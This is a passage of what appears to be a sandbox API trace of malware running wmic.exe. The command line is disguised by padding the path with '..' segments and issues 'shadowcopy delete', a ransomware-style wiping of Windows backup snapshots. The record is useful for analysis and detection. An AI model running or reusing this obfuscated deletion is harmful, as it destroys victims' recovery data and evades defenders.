text=0x1ef640 | out: text=0x1ef640*="texttable.xsl") returned 0x0 [0092.176] IXMLDOMNode:get_attributes (in: This=0x1ccbd50, attributeMap=0x1ef638 | out: attributeMap=0x1ef638*=0x1cc78d0) returned 0x0 [0092.176] malloc (_Size=0x18) returned 0x16c8a0 [0092.176] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1cc78d0, name="KEYWORD", namedItem=0x1ef648 | out: namedItem=0x1ef648*=0x1cca280) returned 0x0 [0092.176] free (_Block=0x16c8a0) [0092.176] IXMLDOMNode:get_nodeValue (in: This=0x1cca280, value=0x1ef680 | out: value=0x1ef680*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x4)) returned 0x0 [0092.176] malloc (_Size=0x18) returned 0x16c8a0 [0092.176] malloc (_Size=0x18) returned 0x16c8c0 [0092.176] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0092.176] SysStringLen (param_1="TABLE") returned 0x5 [0092.176] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0092.176] SysStringLen (param_1="XML") returned 0x3 [0092.176] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0092.176] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0092.176] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0092.176] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0092.176] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0092.176] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0092.176] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0092.176] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0092.176] malloc (_Size=0x30) returned 0x168400 [0092.176] IUnknown:Release (This=0x1ccbd50) returned 0x0 [0092.176] IUnknown:Release (This=0x1cc78d0) returned 0x0 [0092.176] IUnknown:Release (This=0x1cca280) returned 0x0 [0092.176] IXMLDOMNodeList:get_item (in: This=0x1cc9cc0, index=15, listItem=0x1ef630 | out: listItem=0x1ef630*=0x1ccbd50) returned 0x0 [0092.177] IXMLDOMNode:get_text (in: This=0x1ccbd50, text=0x1ef640 | out: text=0x1ef640*="htable.xsl") returned 0x0 [0092.177] IXMLDOMNode:get_attributes (in: This=0x1ccbd50, attributeMap=0x1ef638 | out: attributeMap=0x1ef638*=0x1cc78d0) returned 0x0 [0092.177] malloc (_Size=0x18) returned 0x16c8e0 [0092.177] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1cc78d0, name="KEYWORD", namedItem=0x1ef648 | out: namedItem=0x1ef648*=0x1cca280) returned 0x0 [0092.177] free (_Block=0x16c8e0) [0092.177] IXMLDOMNode:get_nodeValue (in: This=0x1cca280, value=0x1ef680 | out: value=0x1ef680*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x4)) returned 0x0 [0092.177] malloc (_Size=0x18) returned 0x16c8e0 [0092.177] malloc (_Size=0x18) returned 0x16c900 [0092.177] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0092.177] SysStringLen (param_1="TABLE") returned 0x5 [0092.177] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0092.177] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0092.177] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0092.177] SysStringLen (param_1="XML") returned 0x3 [0092.177] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0092.177] SysStringLen (param_1="texttablewsys") returned 0xd [0092.178] SysStringLen (param_1="XML") returned 0x3 [0092.178] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0092.178] malloc (_Size=0x30) returned 0x168440 [0092.178] IUnknown:Release (This=0x1ccbd50) returned 0x0 [0092.178] IUnknown:Release (This=0x1cc78d0) returned 0x0 [0092.178] IUnknown:Release (This=0x1cca280) returned 0x0 [0092.178] IXMLDOMNodeList:get_item (in: This=0x1cc9cc0, index=16, listItem=0x1ef630 | out: listItem=0x1ef630*=0x1ccbd50) returned 0x0 [0092.178] IXMLDOMNode:get_text (in: This=0x1ccbd50, text=0x1ef640 | out: text=0x1ef640*="htable.xsl") returned 0x0 [0092.178] IXMLDOMNode:get_attributes (in: This=0x1ccbd50, attributeMap=0x1ef638 | out: attributeMap=0x1ef638*=0x1cc78d0) returned 0x0 [0092.178] malloc (_Size=0x18) returned 0x16c920 [0092.178] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1cc78d0, name="KEYWORD", namedItem=0x1ef648 | out: namedItem=0x1ef648*=0x1cca280) returned 0x0 [0092.178] free (_Block=0x16c920) [0092.178] IXMLDOMNode:get_nodeValue (in: This=0x1cca280, value=0x1ef680 | out: value=0x1ef680*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x4)) returned 0x0 [0092.178] malloc (_Size=0x18) returned 0x16c920 [0092.178] malloc (_Size=0x18) returned 0x16c940 [0092.178] SysStringLen (param_1="htable-sortby") returned 0xd [0092.178] SysStringLen (param_1="TABLE") returned 0x5 [0092.178] SysStringLen (param_1="htable-sortby") returned 0xd [0092.178] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0092.178] SysStringLen (param_1="htable-sortby") returned 0xd [0092.178] SysStringLen (param_1="XML") returned 0x3 [0092.178] SysStringLen (param_1="htable-sortby") returned 0xd [0092.178] SysStringLen (param_1="texttablewsys") returned 0xd [0092.178] SysStringLen (param_1="htable-sortby") returned 0xd [0092.178] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0092.178] SysStringLen (param_1="XML") returned 0x3 [0092.178] SysStringLen (param_1="htable-sortby") returned 0xd [0092.178] malloc (_Size=0x30) returned 0x168480 [0092.179] IUnknown:Release (This=0x1ccbd50) returned 0x0 [0092.179] IUnknown:Release (This=0x1cc78d0) returned 0x0 [0092.179] IUnknown:Release (This=0x1cca280) returned 0x0 [0092.179] IXMLDOMNodeList:get_item (in: This=0x1cc9cc0, index=17, listItem=0x1ef630 | out: listItem=0x1ef630*=0x1ccbd50) returned 0x0 [0092.179] IXMLDOMNode:get_text (in: This=0x1ccbd50, text=0x1ef640 | out: text=0x1ef640*="mof.xsl") returned 0x0 [0092.179] IXMLDOMNode:get_attributes (in: This=0x1ccbd50, attributeMap=0x1ef638 | out: attributeMap=0x1ef638*=0x1cc78d0) returned 0x0 [0092.179] malloc (_Size=0x18) returned 0x16c960 [0092.179] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1cc78d0, name="KEYWORD", namedItem=0x1ef648 | out: namedItem=0x1ef648*=0x1cca280) returned 0x0 [0092.179] free (_Block=0x16c960) [0092.179] IXMLDOMNode:get_nodeValue (in: This=0x1cca280, value=0x1ef680 | out: value=0x1ef680*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x4)) returned 0x0 [0092.179] malloc (_Size=0x18) returned 0x16c960 [0092.179] malloc (_Size=0x18) returned 0x16c980 [0092.179] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0092.179] SysStringLen (param_1="TABLE") returned 0x5 [0092.179] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0092.179] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0092.179] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0092.179] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0092.179] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0092.179] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0092.179] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0092.179] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0092.179] malloc (_Size=0x30) returned 0x1684c0 [0092.179] IUnknown:Release (This=0x1ccbd50) returned 0x0 [0092.179] IUnknown:Release (This=0x1cc78d0) returned 0x0 [0092.179] IUnknown:Release (This=0x1cca280) returned 0x0 [0092.179] IXMLDOMNodeList:get_item (in: This=0x1cc9cc0, index=18, listItem=0x1ef630 | out: listItem=0x1ef630*=0x1ccbd50) returned 0x0 [0092.180] IXMLDOMNode:get_text (in: This=0x1ccbd50, text=0x1ef640 | out: text=0x1ef640*="mof.xsl") returned 0x0 [0092.180] IXMLDOMNode:get_attributes (in: This=0x1ccbd50, attributeMap=0x1ef638 | out: attributeMap=0x1ef638*=0x1cc78d0) returned 0x0 [0092.180] malloc (_Size=0x18) returned 0x16c9a0 [0092.180] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1cc78d0, name="KEYWORD", namedItem=0x1ef648 | out: namedItem=0x1ef648*=0x1cca280) returned 0x0 [0092.180] free (_Block=0x16c9a0) [0092.180] IXMLDOMNode:get_nodeValue (in: This=0x1cca280, value=0x1ef680 | out: value=0x1ef680*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x4)) returned 0x0 [0092.180] malloc (_Size=0x18) returned 0x16c9a0 [0092.180] malloc (_Size=0x18) returned 0x16c9c0 [0092.180] SysStringLen (param_1="wmiclimofformat") returned 0xf [0092.180] SysStringLen (param_1="TABLE") returned 0x5 [0092.180] SysStringLen (param_1="wmiclimofformat") returned 0xf [0092.180] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0092.180] SysStringLen (param_1="wmiclimofformat") returned 0xf [0092.180] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0092.180] SysStringLen (param_1="wmiclimofformat") returned 0xf [0092.180] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0092.180] SysStringLen (param_1="wmiclimofformat") returned 0xf [0092.180] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0092.180] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0092.180] SysStringLen (param_1="wmiclimofformat") returned 0xf [0092.180] malloc (_Size=0x30) returned 0x168500 [0092.180] IUnknown:Release (This=0x1ccbd50) returned 0x0 [0092.180] IUnknown:Release (This=0x1cc78d0) returned 0x0 [0092.180] IUnknown:Release (This=0x1cca280) returned 0x0 [0092.180] IXMLDOMNodeList:get_item (in: This=0x1cc9cc0, index=19, listItem=0x1ef630 | out: listItem=0x1ef630*=0x1ccbd50) returned 0x0 [0092.180] IXMLDOMNode:get_text (in: This=0x1ccbd50, text=0x1ef640 | out: text=0x1ef640*="textvaluelist.xsl") returned 0x0 [0092.181] IXMLDOMNode:get_attributes (in: This=0x1ccbd50, attributeMap=0x1ef638 | out: attributeMap=0x1ef638*=0x1cc78d0) returned 0x0 [0092.181] malloc (_Size=0x18) returned 0x16c9e0 [0092.181] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1cc78d0, name="KEYWORD", namedItem=0x1ef648 | out: namedItem=0x1ef648*=0x1cca280) returned 0x0 [0092.181] free (_Block=0x16c9e0) [0092.181] IXMLDOMNode:get_nodeValue (in: This=0x1cca280, value=0x1ef680 | out: value=0x1ef680*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x4)) returned 0x0 [0092.181] malloc (_Size=0x18) returned 0x16c9e0 [0092.181] malloc (_Size=0x18) returned 0x16ca00 [0092.181] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0092.181] SysStringLen (param_1="TABLE") returned 0x5 [0092.181] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0092.181] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0092.181] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0092.181] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0092.181] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0092.181] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0092.181] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0092.181] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0092.181] malloc (_Size=0x30) returned 0x168540 [0092.181] IUnknown:Release (This=0x1ccbd50) returned 0x0 [0092.181] IUnknown:Release (This=0x1cc78d0) returned 0x0 [0092.181] IUnknown:Release (This=0x1cca280) returned 0x0 [0092.181] IXMLDOMNodeList:get_item (in: This=0x1cc9cc0, index=20, listItem=0x1ef630 | out: listItem=0x1ef630*=0x1ccbd50) returned 0x0 [0092.181] IXMLDOMNode:get_text (in: This=0x1ccbd50, text=0x1ef640 | out: text=0x1ef640*="textvaluelist.xsl") returned 0x0 [0092.181] IXMLDOMNode:get_attributes (in: This=0x1ccbd50, attributeMap=0x1ef638 | out: attributeMap=0x1ef638*=0x1cc78d0) returned 0x0 [0092.181] malloc (_Size=0x18) returned 0x16ca20 [0092.181] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1cc78d0, name="KEYWORD", namedItem=0x1ef648 | out: namedItem=0x1ef648*=0x1cca280) returned 0x0 [0092.182] free (_Block=0x16ca20) [0092.182] IXMLDOMNode:get_nodeValue (in: This=0x1cca280, value=0x1ef680 | out: value=0x1ef680*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x4)) returned 0x0 [0092.182] malloc (_Size=0x18) returned 0x16ca20 [0092.182] malloc (_Size=0x18) returned 0x16ca40 [0092.182] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0092.182] SysStringLen (param_1="TABLE") returned 0x5 [0092.182] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0092.182] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0092.182] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0092.182] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0092.182] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0092.182] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0092.182] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0092.182] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0092.182] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0092.182] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0092.182] malloc (_Size=0x30) returned 0x168580 [0092.182] IUnknown:Release (This=0x1ccbd50) returned 0x0 [0092.182] IUnknown:Release (This=0x1cc78d0) returned 0x0 [0092.182] IUnknown:Release (This=0x1cca280) returned 0x0 [0092.182] IUnknown:Release (This=0x1cc9cc0) returned 0x0 [0092.182] FreeThreadedDOMDocument:IUnknown:Release (This=0x1ccbc50) returned 0x1 [0092.182] FreeThreadedDOMDocument:IUnknown:Release (This=0x1cc71d0) returned 0x0 [0092.182] free (_Block=0x166f20) [0092.182] GetCommandLineW () returned="\"C:\\bkbe\\yq\\gay\\..\\..\\..\\Windows\\cyh\\huxn\\t\\..\\..\\..\\system32\\a\\e\\b\\..\\..\\..\\wbem\\rop\\mxutf\\..\\..\\wmic.exe\" shadowcopy delete" [0092.183] malloc (_Size=0x100) returned 0x169ea0 [0092.183] memcpy_s (in: _Destination=0x169ea0, _DestinationSize=0xfe, _Source=0x2a25ae, _SourceSize=0xfa | out: _Destination=0x169ea0) returned 0x0 [0092.183] malloc (_Size=0x18) returned 0x16ca60 [0092.183] malloc (_Size=0x18) returned 0x16ca80 [0092.184] malloc (_Size=0x18) returned 0x16caa0 [0092.184] malloc (_Size=0x18) returned 0x16cac0 [0092.184] malloc (_Size=0x80) returned 0x166ee0 [0092.184] GetLocalTime (in: lpSystemTime=0x1ef7f0 | out: lpSystemTime=0x1ef7f0*(wYear=0x7e3, wMonth=0xb, wDayOfWeek=0x1, wDay=0xb, wHour=0xa, wMinute=0x8, wSecond=0x0, wMilliseconds=0x127)) [0092.184] _vsnwprintf (in: _Buffer=0x166ee0, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x1ef748 | out: _Buffer="11-11-2019T10:08:00") returned 19 [0092.184] lstrlenW (lpString=" shadowcopy delete") returned 18 [0092.184] malloc (_Size=0x26) returned 0x166f70 [0092.184] lstrlenW (lpString=" shadowcopy delete") returned 18 [0092.184] lstrlenW (lpString=" shadowcopy delete") returned 18 [0092.184] malloc (_Size=0x26) returned 0x166fa0 [0092.184] lstrlenW (lpString=" shadowcopy delete") returned 18 [0092.184] lstrlenW (lpString=" shadowcopy delete") returned 18 [0092.184] lstrlenW (lpString=" shadowcopy delete") returned 18 [0092.184] malloc (_Size=0x16) returned 0x16cae0 [0092.184] lstrlenW (lpString="shadowcopy") returned 10 [0092.184] _wcsicmp (_String1="shadowcopy", _String2="\"NULL\"") returned 81 [0092.184] malloc (_Size=0x16) returned 0x16cb00 [0092.184] malloc (_Size=0x8) returned 0x16cd30 [0092.184] free (_Block=0x0) [0092.184] free (_Block=0x16cae0) [0092.184] lstrlenW (lpString=" shadowcopy delete") returned 18 [0092.184] malloc (_Size=0xe) returned 0x16cae0 [0092.184] lstrlenW (lpString="delete") returned 6 [0092.184] _wcsicmp (_String1="delete", _String2="\"NULL\"") returned 66 [0092.184] malloc (_Size=0xe) returned 0x16cb20 [0092.184] malloc (_Size=0x10) returned 0x16cb40 [0092.184] memmove_s (in: _Destination=0x16cb40, _DestinationSize=0x8, _Source=0x16cd30, _SourceSize=0x8 | out: _Destination=0x16cb40) returned 0x0 [0092.184] free (_Block=0x16cd30) [0092.184] free (_Block=0x0) [0092.184] free (_Block=0x16cae0) [0092.184] malloc (_Size=0x10) returned 0x16cae0 [0092.185] lstrlenW (lpString="QUIT") returned 4 [0092.185] lstrlenW (lpString="shadowcopy") returned 10 [0092.185] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="QUIT", cchCount2=4) returned 3 [0092.185] lstrlenW (lpString="EXIT") returned 4 [0092.185] lstrlenW (lpString="shadowcopy") returned 10 [0092.185] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="EXIT", cchCount2=4) returned 3 [0092.185] free (_Block=0x16cae0) [0092.185] WbemLocator:IUnknown:AddRef (This=0x1f21390) returned 0x2 [0092.185] malloc (_Size=0x10) returned 0x16cae0 [0092.185] lstrlenW (lpString="/") returned 1 [0092.185] lstrlenW (lpString="shadowcopy") returned 10 [0092.185] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="/", cchCount2=1) returned 3 [0092.185] lstrlenW (lpString="-") returned 1 [0092.185] lstrlenW (lpString="shadowcopy") returned 10 [0092.185] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="-", cchCount2=1) returned 3 [0092.185] lstrlenW (lpString="CLASS") returned 5 [0092.185] lstrlenW (lpString="shadowcopy") returned 10 [0092.185] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CLASS", cchCount2=5) returned 3 [0092.185] lstrlenW (lpString="PATH") returned 4 [0092.185] lstrlenW (lpString="shadowcopy") returned 10 [0092.185] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="PATH", cchCount2=4) returned 3 [0092.185] lstrlenW (lpString="CONTEXT") returned 7 [0092.185] lstrlenW (lpString="shadowcopy") returned 10 [0092.185] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CONTEXT", cchCount2=7) returned 3 [0092.185] lstrlenW (lpString="shadowcopy") returned 10 [0092.185] malloc (_Size=0x16) returned 0x16cb60 [0092.185] lstrlenW (lpString="shadowcopy") returned 10 [0092.186] GetCurrentThreadId () returned 0x4fc [0092.186] ??0CHString@@QEAA@XZ () returned 0x1ef600 [0092.186] malloc (_Size=0x18) returned 0x16cb80 [0092.186] malloc (_Size=0x18) returned 0x16cba0 [0092.186] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1f21390, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x100062998 | out: ppNamespace=0x100062998*=0x1f33a98) returned 0x0 [0092.222] free (_Block=0x16cba0) [0092.222] free (_Block=0x16cb80) [0092.222] CoSetProxyBlanket (pProxy=0x1f33a98, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0092.222] ??1CHString@@QEAA@XZ () returned 0x7fef877482c [0092.222] GetCurrentThreadId () returned 0x4fc [0092.222] ??0CHString@@QEAA@XZ () returned 0x1ef498 [0092.223] malloc (_Size=0x18) returned 0x16cb80 [0092.223] malloc (_Size=0x18) returned 0x16cba0 [0092.223] malloc (_Size=0x18) returned 0x16cbc0 [0092.223] malloc (_Size=0x18) returned 0x16cbe0 [0092.223] SysStringLen (param_1="root\\cli") returned 0x8 [0092.223] SysStringLen (param_1="\\") returned 0x1 [0092.223] malloc (_Size=0x18) returned 0x16cc00 [0092.223] SysStringLen (param_1="root\\cli\\") returned 0x9 [0092.223] SysStringLen (param_1="ms_409") returned 0x6 [0092.223] free (_Block=0x16cbe0) [0092.223] free (_Block=0x16cbc0) [0092.223] free (_Block=0x16cba0) [0092.223] free (_Block=0x16cb80) [0092.223] malloc (_Size=0x18) returned 0x16cb80 [0092.223] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1f21390, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1000629a0 | out: ppNamespace=0x1000629a0*=0x1f33b28) returned 0x0 [0092.235] free (_Block=0x16cb80) [0092.235] free (_Block=0x16cc00) [0092.235] ??1CHString@@QEAA@XZ () returned 0x7fef877482c [0092.235] GetCurrentThreadId () returned 0x4fc [0092.235] ??0CHString@@QEAA@XZ () returned 0x1ef610 [0092.235] malloc (_Size=0x18) returned 0x16cc00 [0092.235] malloc (_Size=0x18) returned 0x16cb80 [0092.235] malloc (_Size=0x18) returned 0x16cba0 [0092.235] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0092.235] malloc (_Size=0x3a) returned 0x16cd30 [0092.235] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffff1980, cbMultiByte=-1, lpWideCharStr=0x16cd30, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0092.235] free (_Block=0x16cd30) [0092.235] malloc (_Size=0x18) returned 0x16cbc0 [0092.235] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0092.235] SysStringLen (param_1="shadowcopy") returned 0xa [0092.235] malloc (_Size=0x18) returned 0x16cbe0 [0092.235] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='shadowcopy") returned 0x26 [0092.235] SysStringLen (param_1="'") returned 0x1 [0092.236] free (_Block=0x16cbc0) [0092.236] free (_Block=0x16cba0) [0092.236] free (_Block=0x16cb80) [0092.236] free (_Block=0x16cc00) [0092.236] IWbemServices:GetObject (in: This=0x1f33a98, strObjectPath="MSFT_CliAlias.FriendlyName='shadowcopy'", lFlags=0, pCtx=0x0, ppObject=0x1ef618*=0x0, ppCallResult=0x0 | out: ppObject=0x1ef618*=0x1f404e0, ppCallResult=0x0) returned 0x0 [0092.248] malloc (_Size=0x18) returned 0x16cc00 [0092.248] IWbemClassObject:Get (in: This=0x1f404e0, wszName="Target", lFlags=0, pVal=0x1ef540*(varType=0x0, wReserved1=0x6, wReserved2=0x1, wReserved3=0x0, varVal1=0x100062998, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1ef540*(varType=0x8, wReserved1=0x6, wReserved2=0x1, wReserved3=0x0, varVal1="Select * from Win32_ShadowCopy", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0092.248] free (_Block=0x16cc00) [0092.248] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0092.248] malloc (_Size=0x3e) returned 0x16cd30 [0092.248] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0092.248] malloc (_Size=0x18) returned 0x16cc00 [0092.249] IWbemClassObject:Get (in: This=0x1f404e0, wszName="PWhere", lFlags=0, pVal=0x1ef540*(varType=0x0, wReserved1=0x6, wReserved2=0x1, wReserved3=0x0, varVal1=0x2d2c78, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1ef540*(varType=0x8, wReserved1=0x6, wReserved2=0x1, wReserved3=0x0, varVal1=" Where ID = '#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0092.249] free (_Block=0x16cc00) [0092.249] lstrlenW (lpString=" Where ID = '#'") returned 15 [0092.249] malloc (_Size=0x20) returned 0x16cd80 [0092.249] lstrlenW (lpString=" Where ID = '#'") returned 15 [0092.249] malloc (_Size=0x18) returned 0x16cc00 [0092.249] IWbemClassObject:Get (in: This=0x1f404e0, wszName="Connection", lFlags=0, pVal=0x1ef540*(varType=0x0, wReserved1=0x6, wReserved2=0x1, wReserved3=0x0, varVal1=0x31bd28, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1ef540*(varType=0xd, wReserved1=0x6, wReserved2=0x1, wReserved3=0x0, varVal1=0x1f409c0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0092.249] free (_Block=0x16cc00) [0092.249] IUnknown:QueryInterface (in: This=0x1f409c0, riid=0xffff7360*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1ef530 | out: ppvObject=0x1ef530*=0x1f409c0) returned 0x0 [0092.249] GetCurrentThreadId () returned 0x4fc [0092.249] ??0CHString@@QEAA@XZ () returned 0x1ef458 [0092.249] malloc (_Size=0x18) returned 0x16cc00 [0092.249] IWbemClassObject:Get (in: This=0x1f409c0, wszName="Namespace", lFlags=0, pVal=0x1ef480*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x10000738f, varVal2=0x16cc00), pType=0x0, plFlavor=0x0 | out: pVal=0x1ef480*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x16cc00), pType=0x0, plFlavor=0x0) returned 0x0 [0092.249] free (_Block=0x16cc00) [0092.249] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0092.249] malloc (_Size=0x16) returned 0x16cc00 [0092.249] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0092.249] malloc (_Size=0x18) returned 0x16cb80 [0092.249] IWbemClassObject:Get (in: This=0x1f409c0, wszName="Locale", lFlags=0, pVal=0x1ef480*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x347fa8, varVal2=0x16cc00), pType=0x0, plFlavor=0x0 | out: pVal=0x1ef480*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x16cc00), pType=0x0, plFlavor=0x0) returned 0x0 [0092.249] free (_Block=0x16cb80) [0092.250] lstrlenW (lpString="ms_409") returned 6 [0092.250] malloc (_Size=0xe) returned 0x16cb80 [0092.250] lstrlenW (lpString="ms_409") returned 6 [0092.250] malloc (_Size=0x18) returned 0x16cba0 [0092.250] IWbemClassObject:Get (in: This=0x1f409c0, wszName="User", lFlags=0, pVal=0x1ef480*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x347fa8, varVal2=0x16cc00), pType=0x0, plFlavor=0x0 | out: pVal=0x1ef480*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x347fa8, varVal2=0x16cc00), pType=0x0, plFlavor=0x0) returned 0x0 [0092.250] free (_Block=0x16cba0) [0092.250] malloc (_Size=0x18) returned 0x16cba0 [0092.250] IWbemClassObject:Get (in: This=0x1f409c0, wszName="Password", lFlags=0, pVal=0x1ef480*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x347fa8, varVal2=0x16cc00), pType=0x0, plFlavor=0x0 | out: pVal=0x1ef480*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x347fa8, varVal2=0x16cc00), pType=0x0, plFlavor=0x0) returned 0x0 [0092.250] free (_Block=0x16cba0) [0092.250] malloc (_Size=0x18) returned 0x16cba0 [0092.250] IWbemClassObject:Get (in: This=0x1f409c0, wszName="Server", lFlags=0, pVal=0x1ef480*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x347fa8, varVal2=0x16cc00), pType=0x0, plFlavor=0x0 | out: pVal=0x1ef480*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x16cc00), pType=0x0, plFlavor=0x0) returned 0x0 [0092.250] free (_Block=0x16cba0) [0092.250] lstrlenW (lpString=".") returned 1 [0092.250] malloc (_Size=0x4) returned 0x16cdb0 [0092.250] lstrlenW (lpString=".") returned 1 [0092.250] malloc (_Size=0x18) returned 0x16cba0 [0092.250] IWbemClassObject:Get (in: This=0x1f409c0, wszName="Authority", lFlags=0, pVal=0x1ef480*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x347fa8, varVal2=0x16cc00), pType=0x0, plFlavor=0x0 | out: 